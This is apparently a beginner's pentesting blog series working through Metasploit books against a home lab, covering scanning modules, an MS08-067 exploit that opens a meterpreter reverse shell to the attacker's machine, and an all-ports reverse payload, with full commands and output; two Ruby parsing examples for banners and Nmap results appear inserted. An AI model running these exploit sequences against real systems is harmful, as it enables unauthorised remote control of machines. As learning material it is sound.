Channel: Pax Pentest » Metasploit

Solving Metasploit msfupdate problem in Backtrack 5 with localhost:3790

If, like me, you are reading books on Penetration Testing, it is highly likely that some of the information is out of date.

In The Basics of Hacking and Penetration Testing the author arrives at an ‘Exploitation Framework’ called Metasploit. The author uses adjectives such as Favourite, Quintessential, Powerful, Flexible, Awesomeness and Coolest to describe this tool. It certainly caught my attention, so much so that I went on to purchase Metasploit: The Penetration Tester’s Guide.

One of the first things we are advised to do with this tool is update it. The technique for this is the ‘msfupdate’ command within the msfconsole. Trouble is, this no longer works. It’s horrible encountering problems at the first hurdle and so I thought I’d share the solution.

I found the solution here and it’s very straightforward. In Backtrack 5, start msfpro, then pop https://localhost:3790 into your browser and you’ll (eventually) be greeted with a form; fill this in, opt for Metasploit Community Edition and grab yourself a product key. Your browser may give a security warning; ignore this and ‘proceed anyway’.

Update the software and you’re good to go.

You can find a handy troubleshooting guide here.


Learning Metasploit and configuring my virtual hacking Lab

OK, it’s time for me to begin my discovery of Metasploit.

This is a framework tool for developing and executing exploit code against remote target machines.

I’ve read that Metasploit should be used like a surgeon’s scalpel or a sniper rifle, rather than the bludgeoning hatchet or splatter gun that noobies are prone to wield.

In view of this I’ve purchased Metasploit: The Penetration Tester’s Guide. I’m determined to learn this tool inside out and avoid simply becoming a script kiddie, so I am also embarking on learning Ruby, the programming language in which Metasploit is written.

Early on in the book it is said:

The proper use and setup of a hacking lab is vital because one of the most effective means to learn something is by doing that thing.

And this is exactly where I have started.

I managed to scrounge an old desktop from a friend which had the requisite Windows XP Pro Service Pack 2 (unpatched). The firewall and software updates have been switched off. Microsoft Internet Information Services (IIS) and the FTP service are enabled. SQL Server 2005 Express has been downloaded and configured, and a vulnerable web app is up and running.

I also set up a virtual Ubuntu 9.04 ‘Jaunty Jackalope’ operating system on the host machine. I ‘bridged’ the internet connection so the router treats this as another physical machine and allocates it a network IP address.

All of this was set up as per the instructions of the book.

Obviously all of this software is outdated, but I’m hoping that exploiting the vulnerabilities using Metasploit will afford me valuable and useful experience of using this tool in a safe environment.

I’ll let you know how I get on.

Information Gathering: Nmap Network Port Scanning

Both The Basics of Hacking and Penetration Testing and Metasploit: The Penetration Tester’s Guide introduce us early on to the port scanner Nmap.

Nmap Network Scanning describes the tool thus:

Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

You can read roughly half of this book online for free here.

It’s worth noting at the outset the Nmap book assumes basic familiarity with TCP/IP and networking concepts. The TCP/IP Guide is recommended, but before buying, a free online version is available. This is an extremely lengthy guide, but if you’re starting from the place of near complete ignorance as I was, then I do recommend spending time reading it.

You can run Nmap in Backtrack/Kali by simply typing ‘nmap’ in the terminal.

Here is the output from an Nmap scan (nmap -Pn -sS ipaddress) of the Windows system on my Virtual Hacking Lab:

Host is up (0.24s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
912/tcp open apex-mesh
1025/tcp open NFS-or-IIS
1433/tcp open ms-sql-s

When I performed the scan again with the -A flag, which attempts advanced service enumeration and banner grabbing and so gives even more detail about the target, the results included:

80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Metasploit Sample Web Attack Site
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM

Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

With all of this information at hand, exploiting the system would be a breeze.

Nmap results can be imported into Metasploit.

Metasploit Server Message Block Scanner: smb_version module

Metasploit has an inbuilt ‘targeted’ scanner designed specifically to identify Microsoft Windows versions on a network, called the smb_version module.

SMB stands for Server Message Block and Wiki says this:

In computer networking, Server Message Block (SMB), also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows, where it was known as “Microsoft Windows Network” before the subsequent introduction of Active Directory. Corresponding Windows services are the “Server Service” (for the server component) and “Workstation Service” (for the client component).

OK, let’s see how the scan performs on my Virtual Hacking Lab.

Once inside the msf Console:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS ipaddress
RHOSTS => ipaddress
msf auxiliary(smb_version) > run

Output:

ipaddress is running Windows XP Service Pack 2 (language: English) (name:LAB) (domain:WORKGROUP)

This Metasploit scan was more precise and accurate than the Nmap scan, which, although it correctly identified the operating system as Windows XP, could not determine whether it was Service Pack 2 or 3.

Metasploit Microsoft SQL Server Scanner: mssql_ping

Metasploit has an inbuilt module – mssql_ping – designed specifically to scan for Microsoft SQL servers on a network.

So, let’s see how it performs against my Virtual Hacking Lab.

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS ipaddress
RHOSTS => ipaddress
msf auxiliary(mssql_ping) > run

Output:

[*] SQL Server information for ipaddress:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Pretty comprehensive, I’m sure you’ll agree: the SQL Server name, the version and the TCP port on which it is listening.

Metasploit FTP Scanner: ftp_version Module

Metasploit has an inbuilt module – ftp_version – designed specifically to scan for File Transfer Protocol services (FTP) on a network.

Let’s see how it performs against my Virtual Hacking Lab:

msf > use scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ftp_version) > set THREADS 255
THREADS => 255
msf auxiliary(ftp_version) > run

Output:

192.168.1.79:21 FTP Banner: ’220 Microsoft FTP Service\x0d\x0a’

So, the FTP service has been identified, but does it allow anonymous login?

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(anonymous) > set Threads 50
Threads => 50
msf auxiliary(anonymous) > run

Output:

192.168.1.79:21 Anonymous READ (220 Microsoft FTP Service)

Yep, Metasploit has detected the FTP service can be read by anyone. I was expecting Metasploit to identify anonymous write access also, but for some reason it didn’t pick this up.

Metasploit: Simple Network Management protocol (SNMP) snmp_enum Auxiliary Module

Metasploit has an in-built auxiliary module designed to sweep for Simple Network Management Protocol: snmp_enum.

Let’s see how it performs against my virtual hacking lab:

msf auxiliary(snmp_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(snmp_login) > run

Output:

[*] :161SNMP – [001/118] – 192.168.1.79:161 – SNMP – Trying public… [+] SNMP: 192.168.1.79 community string: ‘public’ info: ‘Hardware: x86 Family 15 Model 2 Stepping 7 AT/AT COMPATIBLE – Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)’

So, the Metasploit scanner does detect SNMP, but it didn’t uncover the public and private strings; still, I’m sure the information provided may be useful in some way.

Metasploit Basic Vulnerability Scan: Netcat Banner Grabbing

It is possible to write a custom scanner using Metasploit Framework ‘mixins’ and Ruby programming, but that’s too advanced for me and so I will conduct a simple vulnerability scan on my Virtual Hacking Lab.

This Metasploit scan uses Netcat to banner grab on port 80:

msf > netcat
[*] exec: netcat

Cmd line: 192.168.1.79 80
run

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Sun, 19 May 2013 09:04:37 GMT
Content-Type: text/html
Content-Length: 87

As you can see, the web server and its version are identified on port 80.
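The two banners collected in these posts, the FTP greeting that ftp_version printed (with its escaped \x0d\x0a line ending) and the raw HTTP response netcat received on port 80, both carry the server's product name and version. The Ruby below is an added example, not code from the blog or from Metasploit: it parses both banner formats and pulls out the advertised product and version. The inputs are constructed copies of the output shown on the page.

```ruby
# Added example (not from the blog): parse the FTP greeting and the HTTP
# response shown in these posts and extract the server product/version.
# Both inputs are constructed copies of the page's output.
FTP_BANNER_ESCAPED = '220 Microsoft FTP Service\x0d\x0a'   # single quotes keep the backslashes literal
HTTP_RESPONSE = "HTTP/1.1 400 Bad Request\r\n" \
                "Server: Microsoft-IIS/5.1\r\n" \
                "Date: Sun, 19 May 2013 09:04:37 GMT\r\n" \
                "Content-Type: text/html\r\n" \
                "Content-Length: 87\r\n" \
                "\r\n"

# Turn printed "\xNN" escapes back into the bytes the server actually sent.
def unescape_banner(text)
  text.gsub(/\\x([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# FTP greeting: a 3-digit reply code, a space (or "-" for multi-line), then text.
def parse_ftp_banner(escaped)
  raw = unescape_banner(escaped)
  m = /\A(\d{3})[ -](.*?)\r?\n?\z/m.match(raw)
  return nil unless m
  { code: m[1].to_i, text: m[2].strip }
end

# HTTP response: status line, then "Name: value" headers up to the blank line.
def parse_http_response(raw)
  head, _body = raw.split(/\r?\n\r?\n/, 2)
  status_line, *header_lines = head.to_s.split(/\r?\n/)
  return nil if status_line.nil?
  sm = %r{\AHTTP/(\d\.\d) (\d{3})(?: (.*))?\z}.match(status_line)
  return nil unless sm
  headers = {}
  header_lines.each do |h|
    name, value = h.split(":", 2)
    next if value.nil?
    headers[name.strip.downcase] = value.strip   # header names are case-insensitive
  end
  { http_version: sm[1], status: sm[2].to_i, reason: sm[3].to_s, headers: headers }
end

# Split "Microsoft-IIS/5.1" into product and version; nil when no Server header.
def server_product(headers)
  server = headers["server"]
  return nil if server.nil?
  product, version = server.split("/", 2)
  { product: product, version: version }
end

if __FILE__ == $PROGRAM_NAME
  p parse_ftp_banner(FTP_BANNER_ESCAPED)
  p server_product(parse_http_response(HTTP_RESPONSE)[:headers])
end
```

Note that the HTTP parser lower-cases header names before storing them, so a `server:` and a `Server:` header are found the same way; the FTP parser accepts both the space and the hyphen separator, since a multi-line greeting uses `220-` on all but its last line.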

Now to download and install NeXpose (non-commercial Community version), a powerful vulnerability scanner from the same people (Rapid7) that bring us Metasploit.


Where I’m at

OK, I’m a couple of months into this cyber-security hobby and the one thing I’ve learned most keenly, is how much there is to learn. The learning curve is steep and vast and a little overwhelming at times. But one small step at a time.

I seem to have zoned in on OWASP’s Broken Web Apps, Metasploit and Ruby programming, but there is one other area that I have to begin to tackle at this point; namely, networks. In view of this, and contrary to this post, I’m going to take the plunge and purchase Wireshark Network Analysis by Laura Chappell which is quite expensive as well as expansive at around 1000 pages. I’m hoping to learn from this not just about Wireshark, but about networks, packets, protocols, and so on.

I hope it’s the correct decision; it’s difficult to know the right direction without someone pointing the way.

Metasploit SMB Login Check Scanner

Just tried out the Metasploit username and password checker: SMB Login Check Scanner against my Virtual Hacking Lab.

I confess that I’m unsure as to the practical applications of this feature, since the known username and password are entered as input.

Here’s the results against the Windows portion of the Virtual Hacking Lab:

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(smb_login) > set SMBUser Lab1
SMBUser => Lab1
msf auxiliary(smb_login) > set SMBPass password
SMBPass => password
msf auxiliary(smb_login) > run

[*] 192.168.1.79:445 SMB – Starting SMB login bruteforce
[-] 192.168.1.79:445 SMB – [1/3] – FAILED LOGIN (Windows 5.1) Lab1 : [STATUS_LOGON_FAILURE]
[-] 192.168.1.79:445 SMB – [2/3] – FAILED LOGIN (Windows 5.1) Lab1 : Lab1 [STATUS_LOGON_FAILURE]
[-] 192.168.1.79:445 SMB – [3/3] – FAILED LOGIN (Windows 5.1) Lab1 : password [STATUS_LOGON_FAILURE]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see this failed, as did every attempt and derivation. So I switched focus to the Ubuntu portion of the hacking lab, to see if I’d have a better outcome:

msf auxiliary(smb_login) > set RHOSTS 192.168.1.80
RHOSTS => 192.168.1.80
msf auxiliary(smb_login) > set SMBUser ubuntulab
SMBUser => ubuntulab
msf auxiliary(smb_login) > set SMBPass whatever
SMBPass => whatever
msf auxiliary(smb_login) > run

[*] 192.168.1.80:445 SMB – Starting SMB login bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And that’s all it gave me.

So, all in all, a disappointing failure.

My First Metasploit Exploit

I shall attempt my first exploit and target the Windows portion of my Virtual Hacking Lab. I’m following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up is to scan the ports with Nmap from within Metasploit:

nmap -sT -A --script=smb-check-vulns --script-args=unsafe=1 -P0 192.168.1.79

I have run an Nmap scan against this before using different switches; however, this time, included in the results is:

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive
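The Nmap listings in this post and in the earlier port-scan post share one text format: a port table, an "OS details" guess and, with scripts enabled, a "Host script results" block. The Ruby below is an added example, not code from the blog or from Nmap: it parses that format, compares the open ports against an expected baseline so unexpected services stand out, and lists the script checks that report VULNERABLE. The scan text and the baseline are constructed for the example, in the same shape as the page's listings.

```ruby
# Added example (not from the blog): parse Nmap "normal" output (port table,
# OS guess, host-script results) and compare it with an expected baseline.
# The text below is a constructed sample shaped like the page's listings.
SAMPLE_NMAP_OUTPUT = <<~'OUT'
  Host is up (0.24s latency).
  Not shown: 990 closed ports
  PORT STATE SERVICE VERSION
  21/tcp open ftp
  80/tcp open http Microsoft IIS httpd 5.1
  |_http-title: Metasploit Sample Web Attack Site
  135/tcp open msrpc Microsoft Windows RPC
  443/tcp open https?
  445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
  1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM
  OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
  Host script results:
  | smb-check-vulns:
  | MS08-067: VULNERABLE
  | Conficker: Likely CLEAN
  | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
  |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
OUT

# Ports a web-only host is expected to expose (assumed baseline for the example).
WEB_BASELINE = [[80, "tcp"], [443, "tcp"]].freeze

PORT_LINE   = %r{\A(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?\z}
OS_LINE     = /\AOS details:\s*(.+)\z/
SCRIPT_LINE = /\A\|_?\s*([^:]+):\s*(.+)\z/   # e.g. "| MS08-067: VULNERABLE"

def parse_nmap(text)
  result = { ports: [], os: nil, checks: {} }
  in_scripts = false
  text.each_line(chomp: true) do |raw|
    line = raw.strip
    if (m = PORT_LINE.match(line))
      result[:ports] << { port: m[1].to_i, proto: m[2], state: m[3],
                          service: m[4], version: m[5].to_s }
    elsif (m = OS_LINE.match(line))
      result[:os] = m[1]
    elsif line == "Host script results:"
      in_scripts = true            # everything after this is host-script output
    elsif in_scripts && (m = SCRIPT_LINE.match(line))
      result[:checks][m[1].strip] = m[2].strip
    end
  end
  result
end

# Open ports missing from the baseline: the services a defender did not expect.
def unexpected_ports(parsed, baseline)
  parsed[:ports].select do |p|
    p[:state] == "open" && !baseline.include?([p[:port], p[:proto]])
  end
end

# Checks whose status starts with "VULNERABLE" ("NOT VULNERABLE" is excluded).
def vulnerable_checks(parsed)
  parsed[:checks].select { |_, status| status.start_with?("VULNERABLE") }.keys
end

if __FILE__ == $PROGRAM_NAME
  scan = parse_nmap(SAMPLE_NMAP_OUTPUT)
  puts "OS guess: #{scan[:os]}"
  unexpected_ports(scan, WEB_BASELINE).each do |p|
    puts "unexpected: #{p[:port]}/#{p[:proto]} #{p[:service]} #{p[:version]}"
  end
  puts "vulnerable: #{vulnerable_checks(scan).join(', ')}"
end
```

Run against the sample, the baseline diff flags 21, 135, 445 and 1433 as ports a web-only host should not be listening on, and the script check comes back with MS08-067 alone; the `|_http-title` line is ignored because it appears before the "Host script results:" marker.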

Obviously ‘MS08-067: VULNERABLE’ is the pertinent result, so on to the exploit.

I searched Metasploit for the vulnerability:

msf > search MS08-067

Matching Modules
================

Name                                 Disclosure Date  Rank   Description
----                                 ---------------  ----   -----------
exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

So, to the attack:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp (This has the target machine connect to the attacking machine)

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id  Name
--  ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)

….SNIP….

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3 (I know from Nmap scan the Operating System details)
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79 (Target machine)
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70 (Attacking Machine)
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080 (Attacking machine’s listening port)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080

[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.70:8080
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:8080 -> 192.168.1.79:1036) at 2013-06-02 10:06:42 +0100

meterpreter > shell
Process 2236 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And there it is, in all its glory, an interactive command shell. I now have complete control over the target machine.

Obviously the Virtual Hacking Lab target is deliberately configured to be vulnerable, and the operating system is old and unpatched with no firewall; still, I really enjoyed testing out Metasploit for the first time and getting the desired result.

Metasploit The Penetration Tester’s Guide – Ubuntu 9.04 Heap-Based Samba Exploit

Just a quick post to identify a frustrating problem in Metasploit: The Penetration Tester’s Guide.

Chapter five – The Joy of Exploitation – “Exploiting an Ubuntu Machine” simply doesn’t work. The book assumes the Ubuntu 9.04 ‘Jaunty Jackalope’ operating system comes installed with Apache and Samba, which it doesn’t. ‘apt-get install’ doesn’t work and I have not found a solution to this online.

This is all Nmap could offer:

All 1000 scanned ports on ubuntulab.home are closed

Too many fingerprints match this host to give specific OS details

Apparently, this version of Ubuntu comes with all ports closed by default. I’ve tried opening ports, turning off the firewall (I believe off is default), installing software, dual booting, using another VM and so on.

Nothing worked.

I don’t think this exploit is worth the time it would take to configure the necessary vulnerabilities in Ubuntu 9.04. It also feels counterintuitive to expend a great deal of effort making something hackable.

Metasploit All-Ports Payloads: Brute Forcing Ports

I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The object of this is for Metasploit to uncover open ports on the victim machine. My input follows each msf prompt:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name  Disclosure Date  Rank  Description
----  ---------------  ----  -----------
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Cloner

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

msf exploit(ms08_067_netapi) > sessions -1 -v

Active sessions
===============

Id  Type  Information  Connection  Via
--  ----  -----------  ----------  ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

This line:

[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

Shows me that my attacking machine is using port 1053 on the victim machine.

Metasploit: Exploiting MS SQL Server: Fast-Track, mssql_ping, mssql_login, mssql_payload, Meterpreter Shell

I’m targeting the MS SQL Server on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First step: an Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Service Pack it was, but of course I know it’s Service Pack 2.

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And the scan confirms this.

Now to use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
